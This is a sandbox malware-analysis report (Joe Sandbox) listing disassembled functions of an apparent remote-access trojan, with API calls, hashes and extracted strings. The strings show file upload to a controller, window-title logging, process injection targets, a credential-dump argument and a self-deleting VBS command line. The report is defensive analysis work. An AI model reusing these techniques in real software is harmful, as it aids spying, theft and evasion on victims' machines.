                                                                        • Opcode ID: 70aba950a2b95ebb13c8d65f2f758a44faa4d3ad895ec85d2eefe84d0f57c078
                                                                        • Instruction ID: a823f9f94713cfcf68f10210d9a3045d8be0ef455610f442a31bdfac35f60618
                                                                        • Opcode Fuzzy Hash: 70aba950a2b95ebb13c8d65f2f758a44faa4d3ad895ec85d2eefe84d0f57c078
                                                                        • Instruction Fuzzy Hash: A4D102B1E043067BDB19AF6A9C91AEB7BB5AF0135CF10857AEA0097385E7358B038751
                                                                        Function 29144DC1 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 29144E10
                                                                        • LoadLibraryA.KERNEL32(?), ref: 29144E52
                                                                        • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 29144E72
                                                                        • FreeLibrary.KERNEL32(00000000), ref: 29144E79
                                                                        • LoadLibraryA.KERNEL32(?), ref: 29144EB1
                                                                        • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 29144EC3
                                                                        • FreeLibrary.KERNEL32(00000000), ref: 29144ECA
                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 29144ED9
                                                                        • FreeLibrary.KERNEL32(00000000), ref: 29144EF0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                        • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                                        • API String ID: 2490988753-744132762
                                                                        • Opcode ID: 777a14dcf2c10ff7810e0ea3c59f08b74c3fa67f1e67c6d8dad52a4ee010b229
                                                                        • Instruction ID: ac249a1a9d82ac613f6a0e10731e21359b6f0590c629ecd838e73bdb88ed2782
                                                                        • Opcode Fuzzy Hash: 777a14dcf2c10ff7810e0ea3c59f08b74c3fa67f1e67c6d8dad52a4ee010b229
                                                                        • Instruction Fuzzy Hash: 7431B3B1E0535AA7E310EB57C885D8B76E8AF58758F411625E988A3244D738CB03C7A2
                                                                        Function 2914C720 Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 214registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 2914C742
                                                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 2914C786
                                                                        • RegCloseKey.ADVAPI32(?), ref: 2914CA50
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseEnumOpen
                                                                        • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                                        • API String ID: 1332880857-3714951968
                                                                        • Opcode ID: de7a3ae4ad83001d48b9568d0253971447eec65410c030ae56ecde382f278086
                                                                        • Instruction ID: 08d77c59b7cfc8cc328a15e7ba777ec817c196be143567e7ffcc6cfd8d3f7f7f
                                                                        • Opcode Fuzzy Hash: de7a3ae4ad83001d48b9568d0253971447eec65410c030ae56ecde382f278086
                                                                        • Instruction Fuzzy Hash: 0F81E331518245ABD364DB12DC50EEFB7FCBFA4348F90991DE58A82150FF30AB4ACA56
                                                                        Function 044701CA Relevance: 22.9, APIs: 15, Instructions: 419COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Offset: 04420000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4420000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free$_wcschr
                                                                        • String ID:
                                                                        • API String ID: 565560161-0
                                                                        • Opcode ID: a471c829ddd5e79256b59335d7b350d61db07916532beff835d4a4e17985a3d6
                                                                        • Instruction ID: b253fad03e8568893008e3478519399dfd72b3481878aef939e2f6ae702828a6
                                                                        • Opcode Fuzzy Hash: a471c829ddd5e79256b59335d7b350d61db07916532beff835d4a4e17985a3d6
                                                                        • Instruction Fuzzy Hash: CED12872D02300ABEF30AF758D516EA77A8AF01358F0545AFD945A7382EB71B9428751
                                                                        Function 2914D620 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • DefWindowProcA.USER32(?,00000401,?,?), ref: 2914D66B
                                                                        • GetCursorPos.USER32(?), ref: 2914D67A
                                                                        • SetForegroundWindow.USER32(?), ref: 2914D683
                                                                        • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 2914D69D
                                                                        • Shell_NotifyIconA.SHELL32(00000002,291A4B48), ref: 2914D6EE
                                                                        • ExitProcess.KERNEL32 ref: 2914D6F6
                                                                        • CreatePopupMenu.USER32 ref: 2914D6FC
                                                                        • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 2914D711
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                        • String ID: Close
                                                                        • API String ID: 1657328048-3535843008
                                                                        • Opcode ID: a8361915467fce7d12f6c32c14acc2fa9b1e5493dc9fe7bc4a83ffcb4aaba994
                                                                        • Instruction ID: b6e3c9172c1efa46c71a16ee41b072e291c4c0d782a5ce52fd03e648f16a841b
                                                                        • Opcode Fuzzy Hash: a8361915467fce7d12f6c32c14acc2fa9b1e5493dc9fe7bc4a83ffcb4aaba994
                                                                        • Instruction Fuzzy Hash: 47212B75A0018CEFEF056F62ED0EEA93B76FF08345F010114FA09950A9D775AA21EB10
                                                                        Function 29175DD7 Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free$Info
                                                                        • String ID:
                                                                        • API String ID: 2509303402-0
                                                                        • Opcode ID: ef8425cc2cbdd6ecdf68abaddf75354a36cd8969216504ab5d970c494a05a0a8
                                                                        • Instruction ID: 63fdef861355d54f0bbf598004c3f2ea44735e690cdb42b799ac825e42f0cb25
                                                                        • Opcode Fuzzy Hash: ef8425cc2cbdd6ecdf68abaddf75354a36cd8969216504ab5d970c494a05a0a8
                                                                        • Instruction Fuzzy Hash: 15B1CD71D00306AEDB15CF6ACC81BEEBBF4BF18348F10846DE599A7241DB759A42CB61
                                                                        Function 29181346 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ___free_lconv_mon.LIBCMT ref: 2918138A
                                                                          • Part of subcall function 29180582: _free.LIBCMT ref: 2918059F
                                                                          • Part of subcall function 29180582: _free.LIBCMT ref: 291805B1
                                                                          • Part of subcall function 29180582: _free.LIBCMT ref: 291805C3
                                                                          • Part of subcall function 29180582: _free.LIBCMT ref: 291805D5
                                                                          • Part of subcall function 29180582: _free.LIBCMT ref: 291805E7
                                                                          • Part of subcall function 29180582: _free.LIBCMT ref: 291805F9
                                                                          • Part of subcall function 29180582: _free.LIBCMT ref: 2918060B
                                                                          • Part of subcall function 29180582: _free.LIBCMT ref: 2918061D
                                                                          • Part of subcall function 29180582: _free.LIBCMT ref: 2918062F
                                                                          • Part of subcall function 29180582: _free.LIBCMT ref: 29180641
                                                                          • Part of subcall function 29180582: _free.LIBCMT ref: 29180653
                                                                          • Part of subcall function 29180582: _free.LIBCMT ref: 29180665
                                                                          • Part of subcall function 29180582: _free.LIBCMT ref: 29180677
                                                                        • _free.LIBCMT ref: 2918137F
                                                                          • Part of subcall function 29176802: HeapFree.KERNEL32(00000000,00000000,?,29180CEF,?,00000000,?,00000000,?,29180F93,?,00000007,?,?,291814DE,?), ref: 29176818
                                                                          • Part of subcall function 29176802: GetLastError.KERNEL32(?,?,29180CEF,?,00000000,?,00000000,?,29180F93,?,00000007,?,?,291814DE,?,?), ref: 2917682A
                                                                        • _free.LIBCMT ref: 291813A1
                                                                        • _free.LIBCMT ref: 291813B6
                                                                        • _free.LIBCMT ref: 291813C1
                                                                        • _free.LIBCMT ref: 291813E3
                                                                        • _free.LIBCMT ref: 291813F6
                                                                        • _free.LIBCMT ref: 29181404
                                                                        • _free.LIBCMT ref: 2918140F
                                                                        • _free.LIBCMT ref: 29181447
                                                                        • _free.LIBCMT ref: 2918144E
                                                                        • _free.LIBCMT ref: 2918146B
                                                                        • _free.LIBCMT ref: 29181483
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                        • String ID:
                                                                        • API String ID: 161543041-0
                                                                        • Opcode ID: 9c4bf9ec8de9013aa92007d0f150e51db4e1d970fab7ea153bf025bb42cc0b62
                                                                        • Instruction ID: 5aea0f8ac34f8a5290a1104fe2060551ac369477e47782c226c610f948c7b0f8
                                                                        • Opcode Fuzzy Hash: 9c4bf9ec8de9013aa92007d0f150e51db4e1d970fab7ea153bf025bb42cc0b62
                                                                        • Instruction Fuzzy Hash: 3031AF72A00705AFEB158A3BDC41BDA73E8BF01368F20992AE449D7150DB74AB42DB11
                                                                        Function 04472063 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _free.LIBCMT ref: 0447209C
                                                                        • ___free_lconv_mon.LIBCMT ref: 044720A7
                                                                          • Part of subcall function 0447129F: _free.LIBCMT ref: 044712BC
                                                                          • Part of subcall function 0447129F: _free.LIBCMT ref: 044712CE
                                                                          • Part of subcall function 0447129F: _free.LIBCMT ref: 044712E0
                                                                          • Part of subcall function 0447129F: _free.LIBCMT ref: 044712F2
                                                                          • Part of subcall function 0447129F: _free.LIBCMT ref: 04471304
                                                                          • Part of subcall function 0447129F: _free.LIBCMT ref: 04471316
                                                                          • Part of subcall function 0447129F: _free.LIBCMT ref: 04471328
                                                                          • Part of subcall function 0447129F: _free.LIBCMT ref: 0447133A
                                                                          • Part of subcall function 0447129F: _free.LIBCMT ref: 0447134C
                                                                          • Part of subcall function 0447129F: _free.LIBCMT ref: 0447135E
                                                                          • Part of subcall function 0447129F: _free.LIBCMT ref: 04471370
                                                                          • Part of subcall function 0447129F: _free.LIBCMT ref: 04471382
                                                                          • Part of subcall function 0447129F: _free.LIBCMT ref: 04471394
                                                                        • _free.LIBCMT ref: 044720BE
                                                                        • _free.LIBCMT ref: 044720D3
                                                                        • _free.LIBCMT ref: 044720DE
                                                                        • _free.LIBCMT ref: 04472100
                                                                        • _free.LIBCMT ref: 04472113
                                                                        • _free.LIBCMT ref: 04472121
                                                                        • _free.LIBCMT ref: 0447212C
                                                                        • _free.LIBCMT ref: 04472164
                                                                        • _free.LIBCMT ref: 0447216B
                                                                        • _free.LIBCMT ref: 04472188
                                                                        • _free.LIBCMT ref: 044721A0
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Offset: 04420000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4420000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free$___free_lconv_mon
                                                                        • String ID:
                                                                        • API String ID: 3658870901-0
                                                                        • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                                        • Instruction ID: a9bba8a59c4507200a5644a3094d86362fd8a74ddcd7813e7c0774418a744cb5
                                                                        • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                                        • Instruction Fuzzy Hash: C73151315012049FEF206A79D844B9777EAFF00399F10489FE649D7691DEB1B981CB21
                                                                        Function 29138BB5 Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 328fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 29138D1E
                                                                        • GetFileSizeEx.KERNEL32(00000000,?), ref: 29138D56
                                                                        • __aulldiv.LIBCMT ref: 29138D88
                                                                          • Part of subcall function 29134AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 29134B36
                                                                          • Part of subcall function 2914B580: GetLocalTime.KERNEL32(00000000), ref: 2914B59A
                                                                        • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 29138EAB
                                                                        • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 29138EC6
                                                                        • CloseHandle.KERNEL32(00000000), ref: 29138F9F
                                                                        • CloseHandle.KERNEL32(00000000,00000052), ref: 29138FE9
                                                                        • CloseHandle.KERNEL32(00000000), ref: 29139037
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                                                        • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller:
                                                                        • API String ID: 3086580692-2596673759
                                                                        • Opcode ID: 16be0b64e1cb8936ea7a4ec8a1022ce0945ecd9c093ff3c7c37f31931cef355d
                                                                        • Instruction ID: 80bfe130ff0e292efbfcff9e600ad3a855a11c8f0f533333252d5da71ede17d3
                                                                        • Opcode Fuzzy Hash: 16be0b64e1cb8936ea7a4ec8a1022ce0945ecd9c093ff3c7c37f31931cef355d
                                                                        • Instruction Fuzzy Hash: F7B1A731608340AFD358EB36CC91AAFB7F9AFA4258F80991DF44943194DF359B0AC75A
                                                                        Function 29180680 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free
                                                                        • String ID:
                                                                        • API String ID: 269201875-0
                                                                        • Opcode ID: 7464a70fa594ef982a79cb3f4dac1daf6bb9ba251ecb6c47681715fa881e6293
                                                                        • Instruction ID: c9043cf62b865ca77d71a4cddaa3aec5064862233b2f34ad14e44649b4851dbf
                                                                        • Opcode Fuzzy Hash: 7464a70fa594ef982a79cb3f4dac1daf6bb9ba251ecb6c47681715fa881e6293
                                                                        • Instruction Fuzzy Hash: 7EC162B2D40209BFEB54CBA9CC82FDE77F8AB14744F104565FA04FB681D6B09E429B54
                                                                        Function 0447139D Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Offset: 04420000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4420000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free
                                                                        • String ID:
                                                                        • API String ID: 269201875-0
                                                                        • Opcode ID: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                                                                        • Instruction ID: f043a5f4b683e060772a16d3d9cec747b53a29575313db9313d48801c57fde05
                                                                        • Opcode Fuzzy Hash: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                                                                        • Instruction Fuzzy Hash: 70C136B2D40204AFEF20DFA9CC81FDE7BB99B04704F14456AFA45FB282D574AD519B50
                                                                        Function 29142AEF Relevance: 18.0, APIs: 9, Strings: 1, Instructions: 482sleepfileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 29142B08
                                                                          • Part of subcall function 2914BA09: GetCurrentProcessId.KERNEL32(00000000,76F93530,00000000,?,?,?,?,29196478,2913D248,.vbs,?,?,?,?,?,291A52F0), ref: 2914BA30
                                                                          • Part of subcall function 291485A3: CloseHandle.KERNEL32(291340F5,?,?,291340F5,29195E84), ref: 291485B9
                                                                          • Part of subcall function 291485A3: CloseHandle.KERNEL32(29195E84,?,?,291340F5,29195E84), ref: 291485C2
                                                                        • Sleep.KERNEL32(0000000A,29195E84), ref: 29142C5A
                                                                        • Sleep.KERNEL32(0000000A,29195E84,29195E84), ref: 29142CFC
                                                                        • Sleep.KERNEL32(0000000A,29195E84,29195E84,29195E84), ref: 29142D9E
                                                                        • DeleteFileW.KERNEL32(00000000,29195E84,29195E84,29195E84), ref: 29142E00
                                                                        • DeleteFileW.KERNEL32(00000000,29195E84,29195E84,29195E84), ref: 29142E37
                                                                        • DeleteFileW.KERNEL32(00000000,29195E84,29195E84,29195E84), ref: 29142E73
                                                                        • Sleep.KERNEL32(000001F4,29195E84,29195E84,29195E84), ref: 29142E8D
                                                                        • Sleep.KERNEL32(00000064), ref: 29142ECF
                                                                          • Part of subcall function 29134AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 29134B36
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                        • String ID: /stext "
                                                                        • API String ID: 1223786279-3856184850
                                                                        • Opcode ID: 75fa238374504da6eee3afe47aa754f23b95e7210871077a3b8f98f2695c6cb8
                                                                        • Instruction ID: 467b4108a2221b8220d4397478313e2c33d11f7f8ecc7ef4bf806fab3e627ddb
                                                                        • Opcode Fuzzy Hash: 75fa238374504da6eee3afe47aa754f23b95e7210871077a3b8f98f2695c6cb8
                                                                        • Instruction Fuzzy Hash: E10207315083806AD368DB62DC50AEFB3F96FA5208FD0AD1DD49A47194EF306B4FC656
                                                                        Function 29185C5B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 29185929: CreateFileW.KERNEL32(00000000,00000000,?,29185D04,?,?,00000000,?,29185D04,00000000,0000000C), ref: 29185946
                                                                        • GetLastError.KERNEL32 ref: 29185D6F
                                                                        • __dosmaperr.LIBCMT ref: 29185D76
                                                                        • GetFileType.KERNEL32(00000000), ref: 29185D82
                                                                        • GetLastError.KERNEL32 ref: 29185D8C
                                                                        • __dosmaperr.LIBCMT ref: 29185D95
                                                                        • CloseHandle.KERNEL32(00000000), ref: 29185DB5
                                                                        • CloseHandle.KERNEL32(?), ref: 29185EFF
                                                                        • GetLastError.KERNEL32 ref: 29185F31
                                                                        • __dosmaperr.LIBCMT ref: 29185F38
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                        • String ID: H
                                                                        • API String ID: 4237864984-2852464175
                                                                        • Opcode ID: c286dde35157e09b4a3107977197dd3905e00ba23c3c9991c997e3c06fe79281
                                                                        • Instruction ID: 9881db88254dbd67e966a5a1d86c37b2933ebabd06be9eba772310125d7caf64
                                                                        • Opcode Fuzzy Hash: c286dde35157e09b4a3107977197dd3905e00ba23c3c9991c997e3c06fe79281
                                                                        • Instruction Fuzzy Hash: 20A12532A142489FEF0DDF69DC55BED7BB2EB06328F244189E811DB291D7348A13DB51
                                                                        Function 2913F4AF Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 210processCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,291A50E4,?,291A5338), ref: 2913F4C9
                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,291A5338), ref: 2913F4F4
                                                                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 2913F510
                                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 2913F58F
                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,?,?,291A5338), ref: 2913F59E
                                                                          • Part of subcall function 2914C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 2914C286
                                                                          • Part of subcall function 2914C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 2914C299
                                                                        • CloseHandle.KERNEL32(00000000,?,291A5338), ref: 2913F6A9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                                                        • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                                                        • API String ID: 3756808967-1743721670
                                                                        • Opcode ID: 13646a7a3651fca052dc9ac162c8826c559e201f5dcc24390b813f74caeaa09f
                                                                        • Instruction ID: b10f894ce3fc2fb78d5bb7451b28a931e19b55ec07f2c6c069d6df29c5e1902b
                                                                        • Opcode Fuzzy Hash: 13646a7a3651fca052dc9ac162c8826c559e201f5dcc24390b813f74caeaa09f
                                                                        • Instruction Fuzzy Hash: 1B713570518341ABE794DB22DC549DEB7B87FA0248FC0992DE58643151EF34AB0FCB56
                                                                        Function 29144BEB Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 158COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 65535$udp
                                                                        • API String ID: 0-1267037602
                                                                        • Opcode ID: e4166902259f7d5b14a89061ea93b8b99a0b59111d2f4500b82b4b32c74d6a17
                                                                        • Instruction ID: 20f9468c3f06354815a679a0b4da96e4444ad4e08f02d53f279e9dda2c0f17ef
                                                                        • Opcode Fuzzy Hash: e4166902259f7d5b14a89061ea93b8b99a0b59111d2f4500b82b4b32c74d6a17
                                                                        • Instruction Fuzzy Hash: 7F510771E45381ABE3049F17DD06BA677E8AFAC78CF042429FA9C972D0D728CB42C651
                                                                        Function 2913AD11 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 156sleepCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __Init_thread_footer.LIBCMT ref: 2913AD73
                                                                        • Sleep.KERNEL32(000001F4), ref: 2913AD7E
                                                                        • GetForegroundWindow.USER32 ref: 2913AD84
                                                                        • GetWindowTextLengthW.USER32(00000000), ref: 2913AD8D
                                                                        • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 2913ADC1
                                                                        • Sleep.KERNEL32(000003E8), ref: 2913AE8F
                                                                          • Part of subcall function 2913A671: SetEvent.KERNEL32(?,?,00000000,2913B245,00000000), ref: 2913A69D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                        • String ID: [${ User has been idle for $ minutes }$]
                                                                        • API String ID: 911427763-3954389425
                                                                        • Opcode ID: 401a664b05727a7b2ae3833d89060a541161170af2e0ebd0cfa51c944d62a473
                                                                        • Instruction ID: 5bfc78eb71f8ac178cc8f393147149b735b2844bb9db27010ba4db6b3060f386
                                                                        • Opcode Fuzzy Hash: 401a664b05727a7b2ae3833d89060a541161170af2e0ebd0cfa51c944d62a473
                                                                        • Instruction Fuzzy Hash: 395117316042807BD348EB73CC94A6E77B9AF6424CFC0952DE456921D4EF249F07C79A
                                                                        Function 2913D83A Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 148COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 2914288B: TerminateProcess.KERNEL32(00000000,pth_unenc,2913F903), ref: 2914289B
                                                                          • Part of subcall function 2914288B: WaitForSingleObject.KERNEL32(000000FF), ref: 291428AE
                                                                          • Part of subcall function 29143733: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,291A52F0), ref: 2914374F
                                                                          • Part of subcall function 29143733: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 29143768
                                                                          • Part of subcall function 29143733: RegCloseKey.ADVAPI32(00000000), ref: 29143773
                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 2913D894
                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,29196478,29196478,00000000), ref: 2913D9F3
                                                                        • ExitProcess.KERNEL32 ref: 2913D9FF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                        • String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                                        • API String ID: 1913171305-2411266221
                                                                        • Opcode ID: a32bdc440b195bea0749c70ba8cdc51b21f335299da77d56ed54ca85b03c9f3c
                                                                        • Instruction ID: 55d7ef205d7c5db8d4b11b637b4a035aa5e28bc086bdfe84f5757f8a135036de
                                                                        • Opcode Fuzzy Hash: a32bdc440b195bea0749c70ba8cdc51b21f335299da77d56ed54ca85b03c9f3c
                                                                        • Instruction Fuzzy Hash: 09413231D100187AEB59E766DC94DFEB77DAF74208F809169E006A3094FF206F4BCA98
                                                                        Function 2916A8BA Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,29131D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 2916A912
                                                                        • GetLastError.KERNEL32(?,?,29131D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 2916A91F
                                                                        • __dosmaperr.LIBCMT ref: 2916A926
                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,29131D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 2916A952
                                                                        • GetLastError.KERNEL32(?,?,?,29131D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 2916A95C
                                                                        • __dosmaperr.LIBCMT ref: 2916A963
                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,29131D55,?), ref: 2916A9A6
                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,29131D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 2916A9B0
                                                                        • __dosmaperr.LIBCMT ref: 2916A9B7
